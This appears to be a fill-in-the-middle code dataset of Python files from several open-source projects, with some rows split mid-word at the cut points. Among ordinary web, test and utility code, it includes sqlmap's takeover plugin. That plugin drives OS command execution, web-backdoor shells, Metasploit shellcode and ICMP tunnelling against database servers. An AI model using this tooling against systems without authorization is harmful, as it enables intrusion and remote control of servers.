repo_name (stringlengths 5-100) | path (stringlengths 4-231) | language (stringclasses 1 value) | license (stringclasses 15 values) | size (int64 6-947k) | score (float64 0-0.34) | prefix (stringlengths 0-8.16k) | middle (stringlengths 3-512) | suffix (stringlengths 0-8.17k)
---|---|---|---|---|---|---|---|---
helicontech/zoo | Zoocmd/core/models/base_product.py | Python | apache-2.0 | 16,060 | 0.002684
# -*- coding: utf-8 -*-
from core.exception import ProductError
from core.core import Core
from core.helpers.yaml_literal import Literal
from core.env_manager import EnvManager
from core.helpers.version import compare_versions
from core.download_manager import DownloadManager
from core.log_manager import LogManager
from core.models.platform import Platform
from core.models.file import File
from core.models.installer import Installer
from core.models.installed_product import InstalledProductInfo
import os
from collections.abc import Iterable
from collections import OrderedDict
class BaseProduct(object):
"""
Represents the abstract base class for a product.
Descendants: Product, Application, Engine.
"""
def get_typename(self):
"""
Descendants return a string with the type name: 'product', 'application' or 'engine'.
This type name is used in the yaml representation of the product:
- product: Product1
title: ...
"""
raise NotImplementedError()
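# Sketch (added; hypothetical, not in the original file): a descendant
# satisfies this contract by returning its own type name, e.g.
#   class Product(BaseProduct):
#       def get_typename(self):
#           return 'product'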
def __init__(self, core: Core, attrs=None):
self.data = {}
# internal
self.core = core
# self.envs does nothing
self.envs = EnvManager()
self.installer = None
# next fields are loaded from yaml
# meta
self.name = None
self.title = None
self.description = None
self.link = None
self.author = None
self.icon = None
# string list
self.tags = []
self.eula = None
# filters
self.os = None
self.bitness = None
self.web_server = None
self.lang = None
self.platform = None
# versions
self.version = ''
self.installed_version = ''
# installer stuff
self.dependencies = []
self.files = []
self.install_command = None
self.upgrade_command = None
self.config = None
self.uninstall_command = None
self.find_installed_command = None
self.parameters = {}
if attrs is not None:
for item in attrs.keys():
self.__dict__[item] = attrs[item]
self.name = attrs[self.get_typename()]
if attrs.get('files'):
# create File objects for every file item
self.files = []
for f in attrs.get('files', []):
if f.get('file'):
self.files.append(File(self, **f))
self.installer = Installer(self, self.install_command, self.upgrade_command,
self.uninstall_command, self.find_installed_command)
def merge(self, **kwargs):
"""
Merges product representation in 'kwargs' dict with current product.
Current product fields are overwritten by values from kwargs.
:param kwargs: dict with product representation to merge.
"""
# name of attribute (product, engine, application) with product name
typename = self.get_typename()
self.name = kwargs[typename]
####
self.title = kwargs.get('title') or self.title
self.description = kwargs.get('description') or self.description
self.link = kwargs.get('link') or self.link
self.author = kwargs.get('author') or self.author
self.icon = kwargs.get('icon') or self.icon
self.tags = kwargs.get('tags') or self.tags
self.eula = kwargs.get('eula') or self.eula
self.os = kwargs.get('os') or self.os
self.bitness = kwargs.get('bitness') or self.bitness
self.web_server = kwargs.get('webserver') or self.web_server
self.lang = kwargs.get('lang') or self.lang
# this field is not read from the yaml; it is built from the fields above:
self.platform = Platform(self.os, self.bitness, self.web_server, self.lang)
self.dependencies = kwargs.get('dependencies', []) or self.dependencies
self.version = str(kwargs.get('version', '')) or self.version
self.installed_version = str(kwargs.get('installed_version', '')) or self.installed_version
self.config = kwargs.get('config') or self.config
files_list = kwargs.get('files', [])
if files_list:
# create File objects for every file item
self.files = []
for f in files_list:
fs = f.__getstate__() if isinstance(f, File) else f
if fs.get('file'):
self.files.append(File(self, **fs))
self.install_command = kwargs.get('install_command', None) or self.install_command
if self.install_command:
self.install_command = self.install_command.rstrip()
self.upgrade_command = kwargs.get('upgrade_command', None) or self.upgrade_command
if self.upgrade_command:
self.upgrade_command = self.upgrade_command.rstrip()
self.uninstall_command = kwargs.get('uninstall_command', None) or self.uninstall_command
if self.uninstall_command:
self.uninstall_command = self.uninstall_command.rstrip()
self.find_installed_command = kwargs.get('find_installed_command', None) or self.find_installed_command
if self.find_installed_command:
self.find_installed_command = self.find_installed_command.rstrip()
self.parameters = kwargs.get('parameters', None) or self.parameters
# TODO must be deprecated
# create Installer from commands,
# the installer knows how to call install_command and uninstall_command
self.installer = Installer(self, self.install_command,
self.upgrade_command,
self.uninstall_command,
self.find_installed_command)
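# Usage sketch (added; hypothetical values): merging a later yaml definition
# of the same product overwrites non-empty fields and keeps the rest, e.g.
#   prod.merge(product='MyApp', title='New title', version='1.2')
# replaces prod.title and prod.version but leaves prod.description intact.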
def __setattr__(self, name, value):
self.__dict__[name] = value
def __getstate__(self):
"""
Returns a ProductState object used by the Yaml dumper.
ProductState is a smart OrderedDict wrapper.
The method saves only non-empty fields.
:rtype : ProductState
"""
result = ProductState()
result[self.get_typename()] = self.name
if self.title:
result['title'] = self.title
if self.description:
result['description'] = Literal(self.description)
if self.link:
result['link'] = self.link
if self.author:
result['author'] = self.author
if self.icon:
result['icon'] = self.icon
if self.tags:
result['tags'] = self.tags
if self.eula:
result['eula'] = self.eula
if self.os:
result['os'] = self.os
if self.bitness:
result['bitness'] = self.bitness
if self.web_server:
result['web_server'] = self.web_server
if self.lang:
result['lang'] = self.lang
if self.version:
result['version'] = self.version
result['installed_version'] = self.get_installed_version()
if self.dependencies:
result['dependencies'] = self.dependencies
if self.files:
result['files'] = [file.__getstate__() for file in self.files]
if self.install_command:
result['install_command'] = Literal(self.install_command)
if self.upgrade_command:
result['upgrade_command'] = Literal(self.upgrade_command)
if self.uninstall_command:
result['uninstall_command'] = Literal(self.uninstall_command)
if self.find_installed_command:
result['find_installed_command'] = Literal(self.find_installed_command)
result['parameters'] = self.parameters or []
if self.config:
result["config"] = self.config
return result
def to_dict(self, rich=False) -> OrderedDict:
"""
Dumps product fields to an OrderedDict used in JSON responses.
:param rich: dump additional calculated fields.
"""
product_dict = self.__getstate__().get_dict()
if rich:
product_dict['name'] = self.name
dnerdy/django-reroute | reroute/verbs.py | Python | mit | 4,764 | 0.009236
# Copyright (c) 2010 Mark Sandstrom
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from functools import partial
from django.http import HttpResponse
from base import RerouteRegexURLPattern, url_with_pattern_class
from utils import rollup
__all__ = ['verb_url', 'request_method']
def request_method(request):
'''Returns the effective HTTP method of a request. To support the entire range of HTTP methods
from HTML forms (which only support GET and POST), an HTTP method may be emulated by
setting a POST parameter named "_method" to the name of the HTTP method to be emulated.
Example HTML:
<!-- Submits a form using the PUT method -->
<form>
<input type="text" name="name" value="value" />
<button type="submit" name="_method" value="put">Update</button>
</form>
Args:
request: an HttpRequest
Returns:
An upper-case string naming the HTTP method (like django.http.HttpRequest.method)
'''
# For security reasons POST is the only method that supports HTTP method emulation.
# For example, if POST requires csrf_token, we don't want POST methods to be called via
# GET (thereby bypassing CSRF protection). POST has the most limited semantics, and it
# is therefore safe to emulate HTTP methods with less-limited semantics. See
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html ("Safe and Idempotent Methods")
# for details.
if request.method == 'POST' and '_method' in request.POST:
method = request.POST['_method'].upper()
else:
method = request.method
return method
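# Illustrative usage (added; not part of the original module, and it assumes
# a configured Django test environment for RequestFactory):
if __name__ == '__main__':
    from django.test import RequestFactory
    factory = RequestFactory()
    emulated = factory.post('/articles/1/', {'_method': 'put'})
    assert request_method(emulated) == 'PUT'  # emulated via the POST parameter
    assert request_method(factory.get('/articles/1/')) == 'GET'  # no emulation outside POST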
class VerbRegexURLPattern(RerouteRegexURLPattern):
patterns_index = {}
def __init__(self, method, *args, **kwargs):
super(VerbRegexURLPattern, self).__init__(*args, **kwargs)
self.method = method.upper()
def reroute_callback(self, request, *args, **kwargs):
record = self.method_callbacks.get(request_method(request))
if not record:
return HttpResponse(status=405)
callback = record['callback']
kwargs.update(record['default_args'])
callback = rollup(callback, self.wrappers)
return callback(request, *args, **kwargs)
def reroute_config(self, wrappers, patterns_id):
super(VerbRegexURLPattern, self).reroute_config(wrappers, patterns_id)
# Let patterns with identical regexes that are defined within the same call
# to reroute_patterns be called a pattern group. Each pattern in a pattern group
# has a reference to shared dict (shared by the group) which maps http methods
# to pattern callbacks. Only one pattern from a group will ever be resolved (remember
# that the patterns all have identical regexes), so this shared dict is used to route
# to the correct callback for a given http method. All this hoopla is necessary since
# patterns are resolved outside the context of a request.
method_callbacks_by_regex = self.patterns_index.setdefault(patterns_id, {})
method_callbacks = method_callbacks_by_regex.setdefault(self.regex.pattern, {})
if self.method not in method_callbacks:
method_callbacks[self.method] = {'callback': self.callback, 'default_args': self.default_args}
self.default_args = {}
# Borg-like
self.method_callbacks = method_callbacks
def verb_url(method, regex, view, kwargs=None, name=None, prefix=''):
pattern_class = partial(VerbRegexURLPattern, method)
return url_with_pattern_class(pattern_class, regex, view, kwargs, name, prefix)
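# Illustrative wiring (added; the view names are hypothetical placeholders,
# and reroute_patterns is the grouping entry point referenced in the
# reroute_config comments above):
#   urlpatterns = reroute_patterns('',
#       verb_url('GET',  r'^articles/$', list_articles),
#       verb_url('POST', r'^articles/$', create_article),
#   )
# Both entries share one regex, so they form a pattern group; a PUT to
# /articles/ would receive a 405 from reroute_callback.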
chevah/txghserf | txghserf/__init__.py | Python | bsd-3-clause | 32 | 0
"""
GitHu
|
b Web
|
Hooks Server.
"""
jwilder/nginx-proxy | test/test_default-host.py | Python | mit | 212 | 0.004717
import pytest
def test_fallback_on_default(docker_compose, nginxproxy):
r = nginxproxy.get("http://unknown.nginx-proxy.tld/port")
assert r.status_code == 200
assert r.text == "answer from port 81\n"
cmd-ntrf/jupyter-lmod | jupyterlmod/__init__.py | Python | mit | 1,051 | 0.001903
from jupyter_server.utils import url_path_join as ujoin
from .config import Lmod as LmodConfig
from .handler import default_handlers, PinsHandler
def _jupyter_server_extension_paths():
return [{"module": "jupyterlmod"}]
# Jupyter Extension points
def _jupyter_nbextension_paths():
return [
dict(
section="tree", src="static", dest="jupyterlmod", require="jupyterlmod/main"
)
]
def load_jupyter_server_extension(nbapp):
"""
Called when the extension is loaded.
Args:
nbapp : handle to the Notebook webserver instance.
"""
nbapp.log.info("Loading lmod extension")
lmod_config = LmodConfig(parent=nbapp)
launcher_pins = lmod_config.launcher_pins
web_app = nbapp.web_app
base_url = web_app.settings["base_url"]
for path, class_ in default_handlers:
web_app.add_handlers(".*$", [(ujoin(base_url, path), class_)])
web_app.add_handlers(".*$", [
(ujoin(base_url, 'lmod/launcher-pins'), PinsHandler, {'launcher_pins': launcher_pins}),
])
cmjagtap/Algorithms_and_DS | searching/twoRepetedEle.py | Python | gpl-3.0 | 296 | 0.101351
def twoRepEle(array):
if not array:
return None
else:
hash_table = {}
for x in array:
if x in hash_table:
hash_table[x] += 1
elif x != ' ':
hash_table[x] = 1
else:
hash_table[x] = 0
for x in array:
if hash_table[x] == 2:
print(x)
array = [1, 2, 3, 1, 2, 5, 6, 7]
twoRepEle(array)
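# Compact standard-library variant (added for comparison): Counter tallies
# occurrences in one pass and, unlike the loop above, reports each
# twice-seen value once.
from collections import Counter

def two_rep_ele_counter(array):
    # keep the values that occur exactly twice, in first-seen order
    return [x for x, n in Counter(array).items() if n == 2]

print(two_rep_ele_counter([1, 2, 3, 1, 2, 5, 6, 7]))  # -> [1, 2]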
nickpascucci/Robot-Arm | software/desktop/brazo/brazo/AboutBrazoDialog.py | Python | mit | 725 | 0.011034
# -*- Mode: Python; coding: utf-8; indent-tabs-mode: nil; tab-width: 4 -*-
### BEGIN LICENSE
# This file is in the public domain
### END LICENSE
import gettext
from gettext import gettext as _
gettext.textdomain('brazo')
import logging
logger = logging.getLogger('brazo')
from brazo_lib.AboutDialog import AboutDialog
# See brazo_lib.AboutDialog.py for more details about how this class works.
class AboutBrazoDialog(AboutDialog):
__gtype_name__ = "AboutBrazoDialog"
def finish_initializing(self, builder): # pylint: disable=E1002
"""Set up the about dialog"""
super(AboutBrazoDialog, self).finish_initializing(builder)
# Code for other initialization actions should be added here.
sstacha/uweb-install | cms_files/forms.py | Python | apache-2.0 | 192 | 0.005208
from django import forms
class LoginForm(forms.Form):
login = forms.CharField(max_length=255)
password = forms.CharField(widget=forms.PasswordInput())
target = forms.CharField()
V11/volcano | server/sqlmap/plugins/generic/takeover.py | Python | mit | 17,888 | 0.001453
#!/usr/bin/env python
"""
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import os
from lib.core.common import Backend
from lib.core.common import isStackingAvailable
from lib.core.common import readInput
from lib.core.common import runningAsAdmin
from lib.core.data import conf
from lib.core.data import logger
from lib.core.enums import DBMS
from lib.core.enums import OS
from lib.core.exception import SqlmapFilePathException
from lib.core.exception import SqlmapMissingDependence
from lib.core.exception import SqlmapMissingMandatoryOptionException
from lib.core.exception import SqlmapMissingPrivileges
from lib.core.exception import SqlmapNotVulnerableException
from lib.core.exception import SqlmapUndefinedMethod
from lib.core.exception import SqlmapUnsupportedDBMSException
from lib.takeover.abstraction import Abstraction
from lib.takeover.icmpsh import ICMPsh
from lib.takeover.metasploit import Metasploit
from lib.takeover.registry import Registry
from plugins.generic.misc import Miscellaneous
class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
"""
This class defines generic OS takeover functionalities for plugins.
"""
def __init__(self):
self.cmdTblName = "sqlmapoutput"
self.tblField = "data"
Abstraction.__init__(self)
def osCmd(self):
if isStackingAvailable() or conf.direct:
web = False
elif not isStackingAvailable() and Backend.isDbms(DBMS.MYSQL):
infoMsg = "going to use a web backdoor for command execution"
logger.info(infoMsg)
web = True
else:
errMsg = "unable to execute operating system commands via "
errMsg += "the back-end DBMS"
raise SqlmapNotVulnerableException(errMsg)
self.getRemoteTempPath()
self.initEnv(web=web)
if not web or (web and self.webBackdoorUrl is not None):
self.runCmd(conf.osCmd)
if not conf.osShell and not conf.osPwn and not conf.cleanup:
self.cleanup(web=web)
def osShell(self):
if isStackingAvailable() or conf.direct:
web = False
elif not isStackingAvailable() and Backend.isDbms(DBMS.MYSQL):
infoMsg = "going to use a web backdoor for command prompt"
logger.info(infoMsg)
web = True
else:
errMsg = "unable to prompt for an interactive operating "
errMsg += "system shell via the back-end DBMS because "
errMsg += "stacked queries SQL injection is not supported"
raise SqlmapNotVulnerableException(errMsg)
self.getRemoteTempPath()
self.initEnv(web=web)
if not web or (web and self.webBackdoorUrl is not None):
self.shell()
if not conf.osPwn and not conf.cleanup:
self.cleanup(web=web)
def osPwn(self):
goUdf = False
fallbackToWeb = False
setupSuccess = False
self.checkDbmsOs()
if Backend.isOs(OS.WINDOWS):
msg = "how do you want to establish the tunnel?"
msg += "\n[1] TCP: Metasploit Framework (default)"
msg += "\n[2] ICMP: icmpsh - ICMP tunneling"
valids = (1, 2)
while True:
tunnel = readInput(msg, default=1)
if isinstance(tunnel, basestring) and tunnel.isdigit() and int(tunnel) in valids:
tunnel = int(tunnel)
break
elif isinstance(tunnel, int) and tunnel in valids:
break
else:
warnMsg = "invalid value, valid values are 1 and 2"
logger.warn(warnMsg)
else:
tunnel = 1
debugMsg = "the tunnel can be established only via TCP when "
debugMsg += "the back-end DBMS is not Windows"
logger.debug(debugMsg)
if tunnel == 2:
isAdmin = runningAsAdmin()
if not isAdmin:
errMsg = "you need to run sqlmap as an administrator "
errMsg += "if you want to establish an out-of-band ICMP "
errMsg += "tunnel because icmpsh uses raw sockets to "
errMsg += "sniff and craft ICMP packets"
raise SqlmapMissingPrivileges(errMsg)
try:
from impacket import ImpactDecoder
from impacket import ImpactPacket
except ImportError:
errMsg = "sqlmap requires 'python-impacket' third-party library "
errMsg += "in order to run icmpsh master. You can get it at "
errMsg += "http://code.google.com/p/impacket/downloads/list"
raise SqlmapMissingDependence(errMsg)
sysIgnoreIcmp = "/proc/sys/net/ipv4/icmp_echo_ignore_all"
if os.path.exists(sysIgnoreIcmp):
fp = open(sysIgnoreIcmp, "wb")
fp.write("1")
fp.close()
else:
errMsg = "you need to disable ICMP replies by your machine "
errMsg += "system-wide. For example run on Linux/Unix:\n"
errMsg += "# sysctl -w net.ipv4.icmp_echo_ignore_all=1\n"
errMsg += "If you miss doing that, you will receive "
errMsg += "information from the database server and it "
errMsg += "is unlikely to receive commands sent from you"
logger.error(errMsg)
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
self.sysUdfs.pop("sys_bineval")
self.getRemoteTempPath()
if isStackingAvailable() or conf.direct:
web = False
self.initEnv(web=web)
if tunnel == 1:
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
msg = "how do you want to execute the Metasploit shellcode "
msg += "on the back-end database underlying operating system?"
msg += "\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)"
msg += "\n[2] Via shellcodeexec (file system way, preferred on 64-bit systems)"
while True:
choice = readInput(msg, default=1)
if isinstance(choice, basestring) and choice.isdigit() and int(choice) in (1, 2):
choice = int(choice)
break
elif isinstance(choice, int) and choice in (1, 2):
break
else:
warnMsg = "invalid value, valid values are 1 and 2"
logger.warn(warnMsg)
if choice == 1:
goUdf = True
if goUdf:
exitfunc = "thread"
setupSuccess = True
else:
exitfunc = "process"
self.createMsfShellcode(exitfunc=exitfunc, format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed")
if not goUdf:
setupSuccess = self.uploadShellcodeexec(web=web)
if setupSuccess is not True:
if Backend.isDbms(DBMS.MYSQL):
fallbackToWeb = True
else:
msg = "unable to mount the operating system takeover"
raise SqlmapFilePathException(msg)
if Backend.isOs(OS.WINDOWS) and Backend.isDbms(DBMS.MYSQL) and conf.privEsc:
debugMsg = "by default MySQL on Windows runs as SYSTEM "
debugMsg += "user, no need to privilege escalate"
logger.debug(debugMsg)
elif tunnel == 2:
setupSuccess = self.uploadIcmpshSlave(web=web)
if setupSuccess is not True:
if Backend.isDbms(DBMS.MYSQL):
fallbackToWeb = True
locationtech/geowave | python/src/main/python/pygw/statistics/statistic.py | Python | apache-2.0 | 5,623 | 0.001067
#
# Copyright (c) 2013-2020 Contributors to the Eclipse Foundation
#
# See the NOTICE file distributed with this work for additional information regarding copyright
# ownership. All rights reserved. This program and the accompanying materials are made available
# under the terms of the Apache License, Version 2.0 which accompanies this distribution and is
# available at http://www.apache.org/licenses/LICENSE-2.0.txt
# ===============================================================================================
from pygw.base import GeoWaveObject
from .statistic_binning_strategy import StatisticBinningStrategy
from .statistic_type import DataTypeStatisticType, IndexStatisticType, FieldStatisticType
from .binning_strategy_mappings import map_binning_strategy
from ..base.java_transformer import NoOpTransformer
class Statistic(GeoWaveObject):
"""
Base GeoWave statistic.
"""
def __init__(self, java_ref, java_transformer=NoOpTransformer()):
self.java_transformer = java_transformer
super().__init__(java_ref)
def get_statistic_type(self):
"""
Get the statistic type associated with the statistic.
Returns:
The type of this statistic.
"""
pass
def get_description(self):
"""
Gets a description of the statistic.
Returns:
A description of the statistic.
"""
return self._java_ref.getDescription()
def set_tag(self, tag):
"""
Sets the tag of the statistic.
Args:
tag (str): The tag to use for the statistic
"""
self._java_ref.setTag(tag)
def get_tag(self):
"""
Get the tag for the statistic.
Returns:
The tag for this statistic.
"""
return self._java_ref.getTag()
def set_internal(self):
"""
Set the tag of this statistic to the default internal statistic tag.
"""
self._java_ref.setInternal()
def is_internal(self):
"""
Checks if the statistic is an internal statistic.
Returns:
True if the statistic is internal.
"""
return self._java_ref.isInternal()
def set_binning_strategy(self, binning_strategy):
"""
Sets the binning strategy of the statistic.
Args:
binning_strategy (StatisticBinningStrategy): The binning strategy to use for the statistic.
"""
if not isinstance(binning_strategy, StatisticBinningStrategy):
raise AttributeError('Expected an instance of StatisticBinningStrategy')
self._java_ref.setBinningStrategy(binning_strategy.java_ref())
def get_binning_strategy(self):
"""
Gets the binning strategy used by the statistic.
Returns:
The binning strategy used by the statistic.
"""
return map_binning_strategy(self._java_ref.getBinningStrategy())
class IndexStatistic(Statistic):
def get_statistic_type(self):
"""
Get the statistic type associated with the statistic.
Returns:
The type of this statistic.
"""
return IndexStatisticType(self._java_ref.getStatisticType())
def set_index_name(self, name):
"""
Sets the index name of the statistic.
Args:
name (str): The index name to use for the statistic
"""
self._java_ref.setIndexName(name)
def get_index_name(self):
"""
Get the index name associated with the statistic.
Returns:
The index name of this statistic.
"""
return self._java_ref.getIndexName()
class DataTypeStatistic(Statistic):
def get_statistic_type(self):
"""
Get the statistic type associated with the statistic.
Returns:
The type of this statistic.
"""
return DataTypeStatisticType(self._java_ref.getStatisticType())
def set_type_name(self, name):
"""
Sets the type name of the statistic.
Args:
name (str): The type name to use for the statistic
"""
self._java_ref.setTypeName(name)
def get_type_name(self):
"""
Get the type name associated with the statistic.
Returns:
The type name of this statistic.
"""
return self._java_ref.getTypeName()
class FieldStatistic(Statistic):
def get_statistic_type(self):
"""
Get the statistic type associated with the statistic.
Returns:
The type of this statistic.
"""
return FieldStatisticType(self._java_ref.getStatisticType())
def set_type_name(self, name):
"""
Sets the type name of the statistic.
Args:
name (str): The type name to use for the statistic
"""
self._java_ref.setTypeName(name)
def get_type_name(self):
"""
Get the type name associated with the statistic.
Returns:
The type name of this statistic.
"""
return self._java_ref.getTypeName()
def set_field_name(self, field_name):
"""
Sets the field name of the statistic.
Args:
field_name (str): The field name to use for the statistic
"""
self._java_ref.setFieldName(field_name)
def get_field_name(self):
"""
Get the field name associated with the statistic.
Returns:
The field name of this statistic.
"""
return self._java_ref.getFieldName()
ging/keystone | keystone/tests/test_v3_two_factor_auth.py | Python | apache-2.0 | 19,566 | 0.001738
# Copyright (C) 2015 Universidad Politecnica de Madrid
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import urllib
from keystone.tests import test_v3
from keystone.common import config as common_cfg
from keystone.contrib.two_factor_auth import controllers
from keystone.contrib.two_factor_auth import core
from keystone.openstack.common import log
from keystone import exception
import pyotp
import json
LOG = log.getLogger(__name__)
TWO_FACTOR_USER_URL = '/users/{user_id}'
TWO_FACTOR_BASE_URL = '/OS-TWO-FACTOR'
AUTH_ENDPOINT = '/two_factor_auth'
QUESTION_ENDPOINT = '/sec_question'
DATA_ENDPOINT = '/two_factor_data'
DEVICES_ENDPOINT = '/devices'
TWO_FACTOR_URL = TWO_FACTOR_USER_URL + TWO_FACTOR_BASE_URL + AUTH_ENDPOINT
TWO_FACTOR_QUESTION_URL = TWO_FACTOR_USER_URL + TWO_FACTOR_BASE_URL + QUESTION_ENDPOINT
TWO_FACTOR_DATA_URL = TWO_FACTOR_USER_URL + TWO_FACTOR_BASE_URL + DATA_ENDPOINT
TWO_FACTOR_DEVICES_URL = TWO_FACTOR_USER_URL + TWO_FACTOR_BASE_URL + DEVICES_ENDPOINT
class TwoFactorBaseTests(test_v3.RestfulTestCase):
EXTENSION_NAME = 'two_factor_auth'
EXTENSION_TO_ADD = 'two_factor_auth_extension'
SAMPLE_SECURITY_QUESTION = 'Sample question'
SAMPLE_SECURITY_ANSWER = 'Sample answer'
def setUp(self):
super(TwoFactorBaseTests, self).setUp()
# Now that the app has been served, we can query CONF values
self.base_url = 'http://localhost/v3'
self.controller = controllers.TwoFactorV3Controller()
self.manager = core.TwoFactorAuthManager()
def _create_two_factor_key(self, user_id, expected_status=None):
data = self.new_ref()
data['security_question'] = self.SAMPLE_SECURITY_QUESTION
data['security_answer'] = self.SAMPLE_SECURITY_ANSWER
return self.post(
TWO_FACTOR_URL.format(user_id=user_id),
body={'two_factor_auth': data},
expected_status=expected_status
)
def _create_two_factor_key_no_data(self, user_id, expected_status=None):
return self.post(
TWO_FACTOR_URL.format(user_id=user_id),
expected_status=expected_status
)
def _delete_two_factor_key(self, user_id, expected_status=None):
return self.delete(TWO_FACTOR_URL.format(user_id=user_id), expected_status=expected_status)
def _check_is_two_factor_enabled(self, expected_status=None, **kwargs):
return self.head(
TWO_FACTOR_BASE_URL + AUTH_ENDPOINT + '?' + urllib.urlencode(kwargs),
expected_status=expected_status)
def _check_security_question(self, user_id, sec_answer, expected_status=None):
body = {
'two_factor_auth': {
'security_answer': sec_answer
}
}
return self.get(TWO_FACTOR_QUESTION_URL.format(user_id=user_id),
expected_status=expected_status,
body=body)
def _get_two_factor_data(self, user_id, expected_status=None):
return self.get(TWO_FACTOR_DATA_URL.format(user_id=user_id),
expected_status=expected_status)
def _remember_device(self, user_id, expected_status=None, **kwargs):
try:
kwargs['user_id'] = user_id
self.manager.is_two_factor_enabled(user_id=user_id)
except exception.NotFound:
self._create_two_factor_key(user_id=user_id)
return json.loads(self.post(TWO_FACTOR_BASE_URL + DEVICES_ENDPOINT + '?' + urllib.urlencode(kwargs)).body)['two_factor_auth']
def _check_for_device(self, expected_status=None, **kwargs):
response = self.head(TWO_FACTOR_BASE_URL + DEVICES_ENDPOINT + '?' + urllib.urlencode(kwargs), expected_status=expected_status)
def _delete_devices(self, user_id, expected_status=None):
return self.delete(TWO_FACTOR_DEVICES_URL.format(user_id=user_id), expected_status=expected_status)
def _create_user(self):
user = self.new_user_ref(domain_id=self.domain_id)
password = user['password']
user = self.identity_api.create_user(user)
user['password'] = password
return user
def _delete_user(self, user_id):
self.delete(TWO_FACTOR_USER_URL.format(user_id=user_id))
class TwoFactorCRUDTests(TwoFactorBaseTests):
def test_two_factor_enable(self):
self._create_two_factor_key(user_id=self.user_id)
def test_two_factor_new_code(self):
key1 = self._create_two_factor_key(user_id=self.user_id)
key2 = self._create_two_factor_key(user_id=self.user_id)
self.assertNotEqual(key1, key2)
def test_two_factor_new_code_no_data_right(self):
self._create_two_factor_key(user_id=self.user_id)
self._create_two_factor_key_no_data(user_id=self.user_id)
def test_two_factor_new_code_no_data_wrong(self):
self._create_two_factor_key_no_data(user_id=self.user_id, expected_status=400)
def test_two_factor_disable_after_enabling(self):
self._create_two_factor_key(user_id=self.user_id)
self._delete_two_factor_key(user_id=self.user_id)
def test_two_factor_disable_without_enabling(self):
self._delete_two_factor_key(user_id=self.user_id, expected_status=404)
def test_two_factor_is_enabled(self):
self._create_two_factor_key(user_id=self.user_id)
self._check_is_two_factor_enabled(user_id=self.user_id)
def test_two_factor_is_enabled_name_and_domain(self):
self._create_two_factor_key(user_id=self.user_id)
self._check_is_two_factor_enabled(
user_name=self.user['name'],
domain_id=self.user['domain_id'])
def test_two_factor_is_disabled(self):
self._check_is_two_factor_enabled(user_id=self.user_id, expected_status=404)
def test_two_factor_is_disabled_name_and_domain(self):
self._check_is_two_factor_enabled(
user_name=self.user['name'],
domain_id=self.user['domain_id'],
expected_status=404)
def test_two_factor_check_no_params(self):
self._check_is_two_factor_enabled(expected_status=400)
def test_two_factor_check_no_domain(self):
self._check_is_two_factor_enabled(
user_name=self.user['name'],
expected_status=400)
def test_two_factor_check_no_username(self):
self._check_is_two_factor_enabled(
domain_id=self.user['domain_id'],
expected_status=400)
def test_two_factor_is_enabled_after_deleting(self):
self._create_two_factor_key(user_id=self.user_id)
self._check_is_two_factor_enabled(user_id=self.user_id)
self._delete_two_factor_key(user_id=self.user_id)
self._check_is_two_factor_enabled(user_id=self.user_id, expected_status=404)
def test_two_factor_create_key_for_nonexistent_user(self):
self._create_two_factor_key(user_id='nonexistent_user', expected_status=404)
def test_two_factor_delete_user(self):
user = self._create_user()
self._create_two_factor_key(user_id=user['id'])
self._check_is_two_factor_enabled(user_id=user['id'])
self._delete_user(user['id'])
self._check_is_two_factor_enabled(user_id=user['id'], expected_status=404)
class TwoFactorSecQuestionTests(TwoFactorBaseTests):
def test_security_question_get(self):
self._create_two_factor_key(user_id=self.user_id)
data = self._get_two_factor_data(user_id=self.user_id)
self.assertEqual(data.result['two_factor_auth']['security_question'],
self.SAMPLE_SECURITY_QUESTION)
def test_security_question_correct(self):
self._create_two_factor_key(user_id=self.user_id)
dmonroy/chilero.pg | tests/test_sample_app.py | Python | mit | 8,628 | 0.000695
import asyncio
import random
import names
from chilero.web.test import asynctest
from chilero.pg import Resource
from chilero.pg.test import TestCase, TEST_DB_SUFFIX
import json
class Friends(Resource):
order_by = 'name ASC'
search_fields = ['name']
allowed_fields = ['name', 'meta']
required_fields = ['name']
allow_order_by = ['name']
def serialize_object(self, row):
return dict(
id=row[0],
name=row[1],
meta=row[2],
url=self.get_object_url(row[0])
)
def serialize_list_object(self, row):
return dict(
name=row[1],
url=self.get_object_url(row[0])
)
class Friends2(Resource):
order_by = 'name ASC'
search_fields = ['name']
allowed_fields = ['name', 'meta']
required_fields = ['name']
allow_order_by = ['name']
table_name = 'friends'
def serialize_object(self, row):
return dict(
id=row[0],
name=row[1],
meta=row[2],
url=self.get_object_url(row[0])
)
def serialize_list_object(self, row):
return dict(
name=row[1],
url=self.get_object_url(row[0])
)
def index(self):
condition = dict(name='pedro', meta='{}')
index = yield from self.do_index(condition)
return self.response(index)
class BaseTestCase(TestCase):
settings = dict(
db_url='postgres://postgres@localhost:5432/chilero_pg_{}'.format(
